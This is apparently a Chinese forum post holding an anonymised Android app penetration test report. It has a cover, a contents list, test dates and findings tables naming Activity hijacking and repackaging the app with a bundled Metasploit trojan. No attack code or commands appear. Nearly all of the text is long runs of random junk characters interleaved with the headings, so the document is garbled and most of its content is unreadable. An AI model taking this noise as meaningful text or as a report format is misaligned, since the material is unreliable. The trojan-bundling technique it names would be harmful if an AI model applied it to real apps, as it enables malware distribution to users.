找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4453|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
+ {4 Y4 u/ ] Q$ V" {/ e9 T* }6 J & l1 y! b \9 x. f6 E' r; V: X

$ \" E. \6 K0 O $ {5 T+ E7 t* w% Y
, f' d: i0 W( l2 F& k. c/ q 4 I9 P6 H5 r) A

5 G' M% I r% a& G% {: r2 A& v2 t9 E
3 n0 \* w+ b$ H2 q % A; b0 @ i; _% l5 _ x

+ [1 k4 W) }3 f) k# r. J! B' P$ {5 B8 u0 b 文档编号:                L8 o6 ]; E9 c 6 O$ J# u& o. |. ^% h2 K- n

, o- Z' Y$ m+ R e 6 t: L* L9 M7 M+ O$ [% Z; u7 }) Q

- g0 O% N8 z3 A+ x2 s - y( q3 c' E' b z* o& |9 j   ( B6 O' e3 l. H2 G 7 J$ G( I# E& o

Z7 `$ X2 ?9 {2 C ( f) p8 g: \+ _. U6 w

1 `9 t* e( I3 f O x, d1 M. [7 z% c: g7 `* e4 u! u$ t# n, T5 j   # u* k1 \; [ |4 Z+ `! H* I9 |0 _; I1 Z; M+ z

$ Y% b' m( s7 t 1 L# z$ X+ B4 a! N0 G

5 O3 }: r; l6 N$ z9 j# v9 @0 l; v4 O0 L5 R5 v   1 J9 _" X8 O2 s( O) s* c + ~$ m+ B8 P; {5 t9 \

+ [+ I: X- L4 H+ U4 k* R; Z+ | ( N' v. n3 n0 e7 G3 I7 Z1 q

3 p2 F# L' E# D8 j; X5 @ 7 w$ m/ V2 {. ?3 m* O+ m, C; T) r   : L) J* D" F0 \8 \( t3 B- v; X) ]) M' r

x( j" W0 g! F, m1 E" Y2 P, j3 R% T$ \" `5 f

$ j- G0 b) r8 [6 n8 I7 I/ O$ H" x2 v% z( h2 z- Z4 x   9 Z) J! n! V: c+ ~! E H- R 4 S1 k4 J1 h0 A

# R: o9 J4 y$ e Z2 @; B( } ' z3 O& N# ]/ O% L ]5 l# O5 X

0 `3 j5 W% k q6 U% V4 Q5 g% F" f+ a6 A- ~& ]& ?3 s 某某某APP渗透测试 1 B3 f; E* L5 z1 p7 @/ |. J, C7 R. \% X# M9 S

7 J& ^7 u& |& U/ b5 w! n6 w6 c2 |: N: G' G* t0 z3 \& N5 v

: G/ z6 I: P0 h7 ]: }/ C / R ^- N: Q1 W e ^# i( @   6 N/ l( j' l" u $ P4 j& w( I0 z7 l/ z( G/ W2 O4 h

, }2 U: x Y5 \$ m$ q 5 c1 W- \- }0 h5 H

- L: a8 L3 C& W5 \: B# n* M9 ^* h7 b: n$ [( N! ?   9 |; n4 |; W5 U3 X9 l0 h( r9 a ! \- y* o# ^, F; E3 r0 s- b

+ ^$ v( r& m7 L& c 0 O2 |7 T2 D3 P. @0 N# c! s) f

8 m1 U; v. i/ g. W) b ' R, t# ]! W, x6 Q2 Z3 c   4 ]; ~0 K- F& N6 S ; s0 L- B0 n$ B% k' S5 m- S

f7 G' g8 A" ]& F. Y # _% k4 Q! B) ^+ w% f! N

. `/ Z7 V. n8 ~& n0 J) @; }1 h# r8 n/ M& _" @' h- j   8 y4 w$ |) U# ~7 E; F ; P' h# L8 p; b6 X

( M: Z+ U) M; E - r5 m6 U# P/ i, x5 h& J' H

6 ~1 T. B, F/ {: D % [& H$ y2 D, f 技 术 报 告 / ]. }9 M4 v0 g% z8 Y! q9 v6 n( |- u1 w+ n( P3 Y1 G' q

& ~8 O b& D S4 b1 G+ w& E! b2 _+ K# V* s% F& b4 |

2 Y0 @9 s" w9 |1 w9 M/ ? 1 U( p9 O9 m+ P3 w1 }   + N; n. ^! J( _& M/ g " M6 t$ ], N* J) U `; c$ y3 D9 C

K0 o( o# u) N1 y! X7 S- h& C3 B. F4 c# h8 I

+ v0 d% K$ [6 `# F- ? l: e3 E4 ^& W# g, C8 o( n O   , c2 r2 b( d a5 d4 S h) e5 ^% K

& e/ b( y3 _. I% M1 | 4 M, E9 ?9 C5 M: P5 \

7 X7 [4 O& J( u* N: W! y1 k1 j( d' c/ z$ y: y6 i$ [1 R; \   $ P, Y$ j- ]; G' i' O& w! i) D. Q 7 L ^/ W" E( Q3 c% `& ~. W

; o0 r" K+ e) ]7 P7 | % j5 C; P0 h8 u, w0 Q# f

# h, c% C6 U. I; a) ^' W* W0 L1 |% C8 l# `: z5 Y0 O   4 `8 e7 ^: M! F0 j8 Y2 D5 L! G: u1 q2 ~% e1 j3 {- c; s: }

6 {- M* {- V, ~* Q ; o/ L0 p( z6 ]) d1 L( Q

/ J% x# L$ b2 [: O% f* a$ I " z5 H1 p$ \7 Y8 B& ~   ) [0 }3 i) b, }! F3 q0 ` + w4 e( D ^8 G* C3 A; L

9 t9 X$ a4 x1 W! _ . ~* L9 c; q5 L5 a- w# n4 I7 u5 [+ N; B

. Z) t6 L5 f* ^2 ~6 m+ h* M ! X2 h3 z1 G4 R, A* {+ {   ( A& Y% l; }( A4 n6 t % ^" S5 `" b; i9 M

$ w% Q3 v; C! D0 o5 N3 V, E' P ( N/ S t4 j2 n- ~6 _1 I# R6 P

+ t- i- H- T, _2 q9 j 3 N% F* n1 i# v" A   & e. C m, {2 s+ z, _ $ O6 B& A8 b/ T6 B

+ h# z/ m6 k K$ d6 p/ o4 f) O( `1 m

1 p9 v( J' e5 K , l1 a' b" z# S. T   ! @3 p, R% L% w( {$ s1 }) _ ; v! p5 `0 l' r @6 Q: e

" H# H: L( E5 f$ ~' ^% W. X7 J) \! Z! P" c

9 a% m* y4 Z8 X2 _7 d6 _3 g& v& N% x( b8 t& w+ T P6 o   7 T. s" r! d4 L9 W. k2 B4 G/ y0 W

x4 Q% r- {9 V; b4 ] # ^# a$ r9 o% s& U4 k* f

! X2 _" D' t' G% G9 q9 a % l! ~1 [) B4 b! ~! N }   + V! Z) q7 B# ?, V 8 g$ ]1 g& ^% b1 ?' E; f

( I; [6 u% ^* K 3 N8 F+ H k$ O2 M1 A0 ]; _) K

3 w+ @$ Z7 U; x2 N; x& R9 [% G1 e/ k7 c7 u: g6 N9 x0 ~   1 q. R5 w! A% L9 m! I * N6 C! ^2 u- m4 Z+ }# Y" i7 m/ k

7 o' a& K+ A7 f , ]4 W5 [! I" {" j V! @

( b) {! w6 n! n: F3 o( h$ G% ]- ^( f8 b$ e. y* T: D! n   ; M3 {' q) X$ E, [( V: c0 o2 B) h8 j' h( S# A8 u

p$ |2 J& A1 Q' ]& w1 t0 R( ]: y9 E; w

n3 i0 Q. q2 { * S5 W/ [8 r: F( G5 m- C   / u7 Y& c- _2 r2 Q [, {& k1 v6 | + |9 t# d: @% C [

, S8 f( `( Q( [+ D. D; f, c 3 @0 B7 g( i6 a: `: M3 L

3 D) Q1 F f }# R, K& q) Q9 D" x $ s+ ~: P& F! ]   + i1 u4 z0 @% k 3 @% j. j/ y1 F$ i, h1 n) I# c

! N. |1 t1 C) L/ M9 w! h, b% m$ g" _: j

2 N. c$ s+ n+ b! s% V$ ^7 ]5 K( C% a, ?* w/ V& W3 @+ _/ p" u9 J1 h   $ t, U8 c {/ j0 l; m $ v: L0 d; h. E/ U

& c& ? @8 M f3 W* l/ t Z1 E/ t: h

" q& Q; e, }2 | 0 u' k6 P0 w& J6 I( Q   : v- Z( _8 A1 U0 N' y7 r- ?1 {/ u 2 d% g0 q& ^3 h" S" B

0 s. F8 U$ M; f) r0 M8 J : }7 U) }( B0 ]6 i+ m- D# J, u' t: m

. @; _" |: @; ?: V0 L 9 ~* ~5 _$ q4 w1 V   9 N6 _- B" h# s( S 7 }( m! x! a4 S& p- Y' [) W/ G

7 @- Z! c; v8 ?9 y" t5 o ' I3 z, r) R9 e& w% h: ]' `% H% x

2 K7 T" ^+ v* n% {( j4 v8 L- q5 o + O! X' T5 k8 z) @   4 H$ o; o5 ?9 u- S. J6 j ( b/ I. ]7 A( Q4 N

+ \2 V v: X4 } 8 [" g# A. |2 V" e3 F

4 f% @% ?5 C5 ` f- t F, { ) L9 i6 ?1 G* G& e7 l- G1 r 二〇二〇年 ; O# f0 v, u j9 k, J: s+ b# X ( m+ o9 A( y2 a( C0 N; [2 o% _

+ @+ j. k: Z b* D6 R ]- T! ]0 L- Y r7 B0 z; r! P
9 A L. c F! i' u& U 2 }1 W! H5 A% a& C1 J1 @: i* a
/ i8 Z/ |1 @: f' X% Q1 L- P 5 }3 m; _0 ^: G1 y" u! T1 \% i
. A5 I0 g% |- c8 k- B 8 p' a9 s; O! s0 y! }( W' c
& f d7 N# o* D& j8 Q+ ]& W% t , T5 C/ ~. @: y4 F
8 F: b( g# k/ b V) E' q8 b/ } 1 E( b( b5 L F3 \; R9 }5 q
/ j+ w$ Z# E& _: p6 J$ a # K1 h8 K6 s1 W) y" e; S# L
$ E( z! e* I9 ?: L6 C+ y/ g " ?& W$ G0 b/ ?
$ P% | ~" s! _5 Y, [) G 2 C S+ x# K2 q9 J7 J

$ @6 z1 X" k0 l/ X: O9 t 8 b! \9 |% X$ t! B! { 目 录 % q( T: |( I4 T * m/ g L: j' g3 w

8 I$ x: r7 W2 i- T" n 4 `5 R6 E' ^& i* J* @ & M( {1 |5 @ Z' B+ A8 `, K9 r . O* h* w* |7 G+ L8 a, C

' \* H2 b j' T+ z1 ^# j, R ( D5 c2 @/ m% g& s2 M   , q+ Y: j' C5 J 8 `; O' ?; W! S

- l4 z, F3 U: W6 h. _& m' W & E, l0 D8 h# @: g

! D( E0 N$ b; h- h7 p. N$ n , C, f7 j6 m! u/ A5 h0 b \7 {5 Z 1 概述... 3 # \4 h! U( K0 c7 f) i3 G _3 k( P$ g/ e; p; m' d6 z! U

8 V; i$ P, f$ w! l; h % i& n b; \) {& Q2 T# `

& m" G0 R& h: I& B5 r+ a4 l 8 l$ `* g; q5 D# r6 V 1.2测试时间... 3 ( H. o5 y l& e8 Q3 p( w# ?2 q ^% P) V* O' v# N# Q7 k

$ }" ? k* t' } 0 y7 ]- I7 R" c" k+ f8 {

3 V; z# X% ^" S1 e9 o' D 3 z; v5 M' c4 m- [1 w$ b p3 [: y+ I' J 1.3测试对象... 3 ( ]. J# J/ E; i+ r; Q+ F * U& f) ]/ p5 [6 ]' |

$ W! @+ x$ G" d) E' s 9 ]! p' x! m( U# B" P" D

5 X6 I3 ?! |* s. _# F: z ! x, n# E9 B, X* Y' p 1.4测试结果... 3 ; d% S! S- U' R$ j& g! E & l6 E4 B/ N0 W. ~- y: z

( v$ ?& d" ^6 L' t: f: p 5 _/ O+ B. S8 Z2 N# [; F& Q0 D

3 _( v% C$ e+ @/ R7 X * M: [5 Z, Y0 K2 J; } 2 检测结果... 4 # m9 P4 [! b [/ n , x- O9 L9 w/ c0 K" t) N2 A

6 ~2 {3 ?) ?- G, }4 w4 Q$ F& I . D. k" Y( M6 ?/ v

/ N; B9 D& R a' Q% i- I9 p3 r + ]: g0 q* _( ]2 W) G- [* _1 s- g 2.1 某某某... 4 3 M) q* b5 g* e3 X; |3 _8 n4 w6 B. y+ s# {2 m

- A+ O) I$ Z$ k+ `; O" ~ * Q0 i$ M( t0 W% v

; e2 z3 A' Z% Y k3 X/ [9 Y ( m, L+ u: u1 h, T 2.1.1检测目标... 4 ' f. v& C; F, E; X' t. G' { " h$ k8 w: D6 d( M

. g; h$ G b% m% U & F" D9 |9 b7 N; G7 t; n$ ?

* B) R1 O0 o9 N 2 g+ _2 x+ \" Z! J! b* I 2.1.2检测结果... 4 : F1 Y) y2 J- _4 ?* G ; ^+ S1 b, X0 F( l8 C' W# C& n; ?

- l! U/ }5 ~* O ^; w- q4 `" X; x O& F! S+ E5 i

6 {1 Q1 e' b# t/ Z5 G6 n ! H$ |5 f6 z0 a4 H 2.1.2.1. 4 4 |9 x z3 m8 S3 W, C' `+ s `( `4 P6 W; s1 |8 G

0 s# ^, n7 m$ e+ A6 s3 l% w8 h5 t% h# f" L: m

) v% ]( ]* n8 r / T, Q$ b3 A! k 2.1.2.2. 6 ; y0 U1 Q# |, _: L$ S, h& _6 _7 E0 Z9 {# u* [% b

2 d( Q* n# `. f! g; d5 Y% A 6 z0 Q! T0 n8 j2 M2 V' e

' T7 C* N2 D5 H$ A2 I0 W( |9 ~! U9 Z# E& e x . `; W4 a! n/ C5 `% a- s/ S 4 i- y% s) q7 L! P$ R$ |

( T: m& o" G8 l2 O9 w5 q* R4 x % v$ L1 B) @$ d
, ^7 S. p+ C+ n4 `& d& Y- [ 3 ?/ _, \! e. W% `- `! P" k
) Q! u' T+ y+ \- Q8 r4 X # u3 z* {0 ?4 T u, ?( s X( t7 W9 O
" j' t- R% R- p9 ?2 |9 y1 L; ^1 Z2 P3 R( ` K4 ]' m# [, O; \+ v: G/ i; E; u
' Y2 Z. U9 {) {: i6 l3 L% W F% o 7 j: p$ b9 G5 e7 P

7 S$ a- w1 v* H( A' u- Z `; M+ W% w/ F9 b ^ 1 概述 3 s4 f6 r' o0 j + T& J( `1 V% K) n

1 r- A( \% s1 P! J; T& F - C0 c+ K. j; f. G: S' J

; @8 y, l% ~) U5 \* N* [. D1 v* l4 F3 B( A* H 1.2测试时间 . Q& e% b' ~% z& ~ k" E* N9 W9 Q : z3 I; x0 O5 v7 C1 q, c

1 u( w' X9 s8 R$ s* w. |1 L* U$ {5 J+ ]) W2 T- q, O & S2 E. s# L Z9 y+ N, r" e( ~; p" u5 h! e/ Q& @/ W- Q+ e4 h, c( Q2 T/ h5 P6 ~6 l3 d8 C' s, e( c1 x) x0 R2 s# D& k$ k/ J5 H) w: V4 J* t- c p* Q1 [* n6 F* {6 q7 l( q5 n& R- X0 c4 f9 d9 W- j5 S* b! [$ ~* h. J( {+ y5 J' H7 A' i7 P4 z5 U( g2 w* t# f, M) Z6 d" e4 Z2 V& p6 v$ d6 ]( R5 Y6 G& W( w3 D7 n$ p! j% A+ e. o1 s, n6 B. K- D! P `9 R7 e2 V- g1 g6 A# A! L9 h1 X' { v7 j. z$ {3 G7 @, t% X6 ]+ q2 j' I7 a/ ~5 @- p& w0 G# P1 Q3 l1 H* o/ ?1 a$ n! `0 i( F( ~% i, B: D. z+ j- ]- ?2 V; S+ D0 P+ d- @+ J Q) L! d: j/ x4 Q% s1 c) |% Z, T3 I7 m: ~, d; E4 C0 W& H4 D) r. r8 _2 F3 p# l% F# ^' l; z) G8 J9 Z8 p, B Q+ H( T: q. p8 u* X5 B8 R& {, F2 g# L' T2 h3 Y$ F( x" s& C/ o! s" n* v8 m
& r' Z. Z1 m. ]+ {. W u4 y . {4 K2 ?9 Q$ ^, y6 R$ G1 B# K

@! a# J# o! o b: n, B r E5 x i: h& P' B* { 渗透测试时间 : c* Z: |+ m5 x5 F. r _ g! n4 B& c7 S* s% R

5 A2 L& D9 M& `6 _4 R' s) \' }" B# }1 s
% H, \" p# l) h. { 0 ?- y5 U3 D2 c! P0 _

$ k+ Z9 ?4 i& l7 n% M& e: P1 ` 1 }1 C Y6 u6 ~' n 起始时间 + P9 }% O n( P. G( v $ J7 J3 f: k! `4 ^) i6 n

2 i+ L* w' Q9 }9 ~ 9 G4 ?: ^) `# D& W9 X2 k
; B N n0 Z9 ]; }% o6 c : K* O3 W& I! Z0 Q. G) T# h. f( _

8 y1 G$ Z9 ~. e7 f! e / Q7 w) t) k* ]- |6 C7 P 202046 : }4 C# y. v+ } % j ?9 G) t6 ?5 d1 n2 o

v/ y- Q" u. q/ \9 [ f( p: g3 o6 P5 M" o" y
' m+ Y' u, b5 y7 J " H/ o+ A- F, ?& N; F% r

: S$ M7 q3 R8 W! e$ G( e2 z$ W1 c) m- H# q8 t' |0 U 结束时间 + K2 C7 K' ^$ q$ R ' K2 u+ n6 k/ g2 W/ ~

2 V; V6 d" P- P& k + k% _$ T* V, D: K" I
, }$ u! u. X9 @# D" y |, c, b! n # s% D, h) p, ]& L

' {. | a5 h) t2 ^ a' M % \6 w. O# c @, U# b9 S- S 202049 ( N/ q' f* w6 z; h, u& a& ^3 I' |

9 J( K/ K8 l& I! k * j* e: j' {1 p( v
0 h# {- n" \ s. ?# t- k4 t. t ( m2 y) t) }0 c7 t

( Q( N) O# y3 j7 m5 |" p: y5 \) [, u; x6 X6 P. t 1.3测试对象 6 y& A' Z: |" h- o& Q2 m4 X $ h0 Y+ N- [2 K' Q+ k) n

1 p, k. Y3 ~, m. k1 T; s % Z6 }! ], U: G6 |' W! `

/ Y6 j; h/ L, R/ P$ i! l7 U" T, [& F, h6 E2 J" ` 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 1 b( r: L8 c* s- ~/ U( M % t' X, i2 o: Q7 |8 j

) a% W1 Y/ R/ E7 w/ w7 ^/ \8 c' _ ! [9 y/ P0 V# N, ^+ q( o

; o, ~ {8 ^ Q P8 t3 t " A S B6 M3 i5 r 1-1 检测对象 6 f0 R s: @0 |3 P+ ^ }) h2 {9 K* F( f- \3 R

& h3 H9 Q. U, O" O* _9 @! j8 W& H) M: n* S) ~& D5 [1 q 2 w3 _3 K: V+ }. A5 s4 k, y2 d) L8 t, v* Q' W7 U% c G( t% I+ A" A# G* A: @: F0 j( P+ K4 n4 O# x7 y6 _2 |- n' Y' s- r; \' N- K% S' F- c" I; w. V O' W7 F D; O% f9 h5 A# _' {4 a! m4 d% O# p" a" C' u' ~2 \/ }: I& g# M: \3 M7 ?7 f" \$ _( i1 h9 u# l1 j- v0 [8 R! w0 b9 I# d& h$ b8 o2 r7 R! Y9 f& i, Y) t- ^" E) a. s0 i6 t6 m) l J' E3 B' E/ B, U4 g% C# |$ {1 ~5 a# s* x* T7 I* Y! W9 u$ F; E: ~9 G" a7 C' O* p* w7 _9 m3 h$ }% H n# A5 d- Q& E7 G: t, b& x3 v6 Q7 q7 f( \9 T+ {/ K1 P! `% f8 L6 o- v" g; j7 O u6 E& Z5 k# w' F: {4 W2 N2 p0 y9 z- {! }) C R$ h0 a& }, Y" [: h b( u2 A. [& ]7 i& I4 T9 U4 k$ s, ~% G/ o* q: y" {8 ]6 c! S1 [$ s+ {# H9 S; n6 O# ?9 k7 K- F- `5 A9 R8 e, L* r, M8 t! p, |, _% [$ s* A( x% | s7 e
% p/ ?' _& ~0 V& R* I) k ' K6 b1 x/ W; m8 F {8 j0 z8 ?( }

5 c, c0 U) b/ s; `" f / g6 R( Y f' H' j 序号 1 l$ _, x- {! v' v+ Q! B4 S* f * K% E& t9 T, u: e9 N2 D

% i0 D, \) O. d, N / j+ Q. P0 W; B4 ~* ?
9 X2 P* `! L5 d+ P3 _9 ~1 r 1 D( r& [/ s1 `6 y! y6 q

2 \& h/ Q: u' b8 ]; K( k' r 1 r! M( M- q. _7 Z8 ^$ u 测试对象 $ P+ A. M* ]( @- }9 n. b% |( e, ]4 S! f8 f" a; D

( m6 ]6 v4 J' r& @6 X$ a4 d+ K 4 ^$ x( G8 N/ S* U# e
1 E3 Q8 c2 ^' i. D: U7 j 7 {0 S5 Q' \$ v# G! b. M6 B4 H

9 A) n) `" s8 g! {* K % n. U- i" w4 M4 _ 测试地址 - E% b+ Z& q7 k/ h0 Q& b+ K3 ~, N 7 A( q! |( j. y6 F- \5 y& Q8 {

/ R' i; n- `5 M# M6 W0 Q; Z5 k9 Y( e/ T+ c# f P
0 ^+ a. A2 y+ N4 F3 {+ Y! ]: b0 ?7 O- ]- J | u l9 G

" _* U. ]+ r1 R* `& u/ t " U3 `+ X* B- u+ p$ F, S 安全漏洞 j, z' ? y% n, |9 g0 \) e ; @& X8 T2 E: U- \- S

; I7 E; \0 _# J8 I& m, t4 A9 H 8 L5 ~$ e4 Y P! u$ H
) |. W2 C5 [# ]$ K. w: f; [* @; D

6 J% M/ E4 y. O $ E+ G! d- S/ h, T1 o' A5 z 1 8 Y4 A# b/ s) y6 i! D9 { ( G* n2 X7 ?1 F: b6 K0 |, Y

$ _. k0 e N, B* }2 B3 M, w# a 3 P: K8 c& d! M) w$ o
* T1 o, D: x* S# {- z 4 ]0 e0 u a+ }. }& S7 X

, V: r( s8 l; G, l5 y3 N $ Y* |: x% J$ j* z 某某某安卓APP 2 i$ y, |) b J$ b' R. v! i2 q$ H& y1 X4 o9 ?/ y

4 x: w7 M q5 c6 u9 D; y1 M2 u " S- J' X6 t7 M, C0 J
+ r' P- G2 m. d* w- E+ z; ?( c9 `2 d* e$ o6 Q( N* @( M

9 b, g A8 F" B$ \% I$ d) p$ j7 Z5 s+ R( p+ D   ; Z9 Q; `* ^3 [6 s 6 q5 v5 M& s z# C

' a8 J" L/ F! T6 X0 }+ v9 C* G # ?( t: }; U$ h3 m( k+ I0 D
8 D( F- R F4 U+ J( B' D - c, i* {" D& D" M

; a4 G9 T0 R. A) h & Z: X% ?$ I1 ]" v6 A) w& j 2 9 m$ c& l9 q. N8 m H6 }6 r$ o) T" X8 C: B; a" S

( h( Z6 ~8 `' K' x& U+ k1 g 8 R4 x+ f/ |/ ]8 X* q3 r
- l1 E" B) K% m1 C! T% b# J) P8 R4 k g0 F1 C# Z

, j- M2 c# C9 `* O0 l" ^, v) t7 { % N: a8 T8 y7 n: A" q/ ?% ~* V* O 1.4测试结果 " \7 U2 l7 z1 u8 c8 f 8 g$ y8 g' r$ v7 s5 d8 j* B# n& P

0 S0 d. g& Q8 z& k2 }" s ( F/ \2 ?) E" A4 q' \3 h

3 b% j# q; _: @9 O; C9 s ) m5 Q7 g/ b$ D: d, } 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 C" h' c7 |1 N5 F, r) j* T) j, |0 N

# W' x6 F0 R% X/ }& @: i2 O3 @ ) y; r4 ^/ C. }/ c

4 [. [2 I% G' F8 C + i }8 K8 Q3 D) U- \9 R5 K   , E k$ \8 _# K- _8 o" C0 g7 R 6 \) Y, j4 \5 {

0 |- P" B2 c5 l7 N+ P4 k 8 I7 ?" x" C* E( D
" z7 |% K" O6 I% O- ?0 g, Z" o: s2 z2 N 1 \8 }# L6 h# E7 i6 o! ?$ v6 g: Z* y% I& P+ T1 J7 }# I/ [: Y7 ~, y8 I% u1 j' X# L; G1 u% \2 |# C" T3 e" ]! H# i" `) K1 x# D% B% _: E7 ^" z2 N7 A! Q- p2 R& o+ y( m& V. H% u5 M7 E0 S/ n- W& ?! u, x& @" z, c- ^1 {7 i3 P; U& ?4 T# X5 v! F# Q% Z& w# Y! D1 }4 Q5 y3 o! F6 G; Z a+ f6 i/ E" F0 Z: [$ ^9 x6 w3 m l" S4 H: K5 e: z: v. `9 S8 N# H0 J e+ F6 j9 v C, F( w- ]! x+ Z) ?- ]: E, ]( ~$ G6 ?0 U, `! f$ G z7 t, l7 ^3 T0 W& s( s% `& g5 T9 D" |# ?6 ]4 t" U! x) {+ T4 d' i% s5 U- j+ N8 B8 b; s7 o( B; [& g; H7 V0 J4 I1 Y. c: H# V& r+ _4 L0 u: ^4 e7 g/ _$ ~- A! a# }- g, ], z, N7 @2 g6 g2 ~/ k/ `8 P( n( o) J: d, B9 J! D2 x% G2 z7 B3 O$ V6 I& s3 {2 L! b0 g2 u* ? `9 S9 @3 C) m. k- ~) b) p1 R; |! Z" M9 Q' b; Z/ W o8 j& B4 {$ i, ^1 c; r3 V8 l3 ?( ^5 Z& p7 w- U: s* m& j. G2 Z! [& s% l1 Y% m/ Q7 C/ M. s% B! C. k7 s9 W* S8 u1 L: X& Y$ C2 e0 m$ @5 A. G9 Z/ d4 ~0 P/ P& ~2 L: M/ U& w( Q+ ^# N' Y2 i7 a! c. N% {. L- P3 D4 N/ L( [$ {8 W: h1 ~+ }- s W5 D9 v% {) t; q, h- H# K* f! j& z. ?; B/ @ O8 S4 S& p" ~5 K/ r0 e1 P3 y- O0 E ?. v$ f% V7 v) {. C0 p; s! I8 c3 @( @8 q3 {5 c9 d% h
5 V# B) S( R( Z# w; e* m2 I$ I * q/ T9 x5 i5 ?7 G, \& N

. b" D, X0 J+ L3 t. P/ e5 r }( i% F6 a" `1 } 序号 3 A* t/ s6 Y8 ` - \: c8 ^' w* O. ?" d ?* b

: J' m$ r7 [! [, V7 X i $ S$ N3 Y* k4 \2 g
! S/ O$ Z, }; C% Z) L5 `4 K+ R( O& ^$ C; y4 B% o$ J9 a0 m

) W; k3 Q: n K9 v% L: q+ v : B, l5 x3 @2 S2 g/ k/ s8 A 系统名称 & B5 ^" r6 r4 P$ F$ R9 E8 H l3 {3 F# [3 c

) H# C. N. A# v& W+ G* o ) k. g. y' V! `- a. z4 w1 @
# g+ z d! v& d H& u * R x/ q$ H3 f$ K

4 k* a8 H: ?2 c. x+ \1 {& P2 b Q 0 K5 X7 I" j) G# q; X 漏洞名称 6 t$ g' B# Y2 ^% r# x / {' L' J! H- O; c; s" F

* ~+ S! x5 l V% Q4 T: K; V, c $ M8 R& u; y( k; T
% G6 C6 Q- `( i5 |! \, ]' e ( J, O! W( J& T( z& v" D

! ]5 T, X1 I# B6 U 3 J( [% e" Z- s2 q& h y) t 漏洞危害 ! @( \ J+ P( C% h( a8 |. z ( \, _% ?2 l( |: Y4 L9 N' ]/ [6 ?

! s( U2 Z5 H; _" A* E2 J5 i6 R # t' D1 f+ Y, e+ E* c
; N- S7 b7 ?% T# `" |8 w9 b . m; R5 b$ R) J( M

+ c/ m7 b/ G- u ! ]5 w$ h7 m/ o r$ d) N 修复结果 " R0 H- j' ` W . R# A$ } h4 ?1 i6 x( G

1 H6 U0 _& n8 ~7 ]: ~' c , R3 W+ C# U8 z6 }; _1 I
. L- U: w7 c# S- u& D# y ! j" M9 `) G' \, _3 ~8 M+ [2 B

7 T3 _3 w/ k B, ?) w 0 Z* F. e3 Z$ q( `9 W- M 1 ( z& k; T8 \2 H, r1 N% g1 } G* g 3 p Q7 J1 j( V6 r" s7 W

" y( v6 Y: H9 j3 M% f) x ' E* r4 Y2 ]6 v- Z$ L, O4 K
7 i4 @ T" W: V6 Y( m4 G; d & A4 O5 d, E+ q

( p6 T: X" Z( f1 a , m0 n* A' \/ {- I7 @; w 某某某某某某APP 7 z6 e% m' ~/ l; R) z* }+ r1 H " V) O2 b; m/ P0 A. k( _

& m$ o* |/ }# C, i- j - a; d2 x# ]4 ]6 a
3 e* O3 K8 ]; `: E7 `4 o1 n ; _5 ~$ z5 G5 Q% r4 ^. Q3 B0 P6 }/ `

" z7 a9 k- a, ? 1 p0 H3 @# s0 d" ` n8 m$ O$ E$ Q Activity 劫持 : H7 \, P- j3 \: \! D" }4 D 9 |# ?3 j7 C7 M6 ~8 _. [

* [9 \7 W* O/ L) P" @# u " ^; y3 `3 I3 a/ e" Y

1 d) X6 L, }% D" ? 1 w# n8 k; f0 O/ v% I   ' H( T- i8 E7 I' t$ u7 f4 n! F( W- M. k2 X

% q0 @" V: U- s / _" \! O8 t# }2 z
, y) Q" O; i0 Q1 {1 C3 X , [. e8 N7 \* W& d0 \% @9 ^$ D& D

2 t# { ]% n/ j- T. S3 p& u8 Q ; |# c) M/ c, H5 b/ ]/ | / G: O( h9 r3 j/ I+ B- Q + ^9 E' A) _" k* A. Y/ {7 [

. C4 x4 ]- v* K g1 T5 N 5 L. Y" L2 q- e, ~5 L: e
Y q o3 H- W 0 P9 H! p* q+ {! k6 ?% h* F

# z4 u# ~' Q, z |# p1 }- c , c+ r& H% ^2 A1 K7 o; @+ @   5 Y# d- k6 U2 j; j! @ j( o! w( N& r+ |: i& i8 ~* @

, N" {% W; T2 W2 p; M3 f/ x1 W * r4 n4 e$ k0 |% j. s
! O$ J9 T' U- ]' \) [- |0 E" J , `& f# x- l# i7 m* Y$ c

: e6 G# R; {7 p& w) m0 D ( C& y' ?9 }5 y5 Q$ L( w! H4 p 2 7 ^6 l# H# J" x* M5 I8 A# T 9 r' Y0 \- A0 O: q( ?

" T2 c3 \5 p, H, N! U ) d3 }/ \% }( b/ W# J3 Q+ i
, i1 j1 Z( b: R% ~4 Y" `1 Y8 \ ( O. b1 V8 q8 C/ d* b* j

: I! `. u5 z4 \# _ @ , z$ C* @. Z2 @- T$ c& O# q1 E 某某某某某某APP 5 E) @! i5 \& E" v9 i* s 3 ~, a9 e4 [( l( P

0 ~5 U, u' |# P/ j; A ' w# v4 v0 b2 y. R2 s
3 q7 K W9 } n3 ? - W* N: z3 Q% d( k

4 d: P5 z# M2 }, A' }5 ?- ?# W2 }% T , l, t! s- T- _( @* H7 b9 Q 反编译二次打包捆绑木马、篡改APP代码 4 N3 ^: R/ k2 l. I8 I. z5 B 5 ]- W0 Z( _6 S

4 C3 m1 ?; A1 C' r& [ # a. r$ _, w7 ?/ |( m* {) w1 _
: M* O* R) e) N; g+ D( t % z( l$ j: N/ N+ Y; v

9 f; G h! V5 n+ {7 B: W8 L- }( h- o E: C3 O# M / l2 e9 {8 ~. q% l- }% U1 j( m+ s& M }& _, R. D& J: m3 [" f4 G

5 X% ]3 R5 o% O( Q! ]! r% F : m! r5 c6 K1 W# u! m; n
* i e* f3 ] K- O% g% {/ { 5 o6 u- Z* g6 H) g7 K" j, o9 I5 K1 _

9 p( r9 z- t, W% x7 Z$ P. g' v & k& b! [' K3 E$ P9 k% u5 I( j   & J7 K+ p8 Y5 b& m. p) e: o7 ?2 T3 E9 ~: a

4 C/ B8 ]4 y6 j! }# `" s $ x' p: o/ g( w' ^. j0 I
% F' x8 I6 E. A1 b4 J " s m" ^! \9 c) K4 k
5 c9 r V$ l, _0 B c7 m q* m+ Z $ {0 Q8 c' Y) v9 f

: j+ E7 K) d& e: A7 p; x+ N - c# s) I" b% l; D9 q4 a   $ k4 }9 h6 c8 K( `# } 1 J% w9 K" h' G( q/ g

( U# {; K( S$ L+ v; q) D& K ' Z8 ]. s* b h/ L5 _4 ?

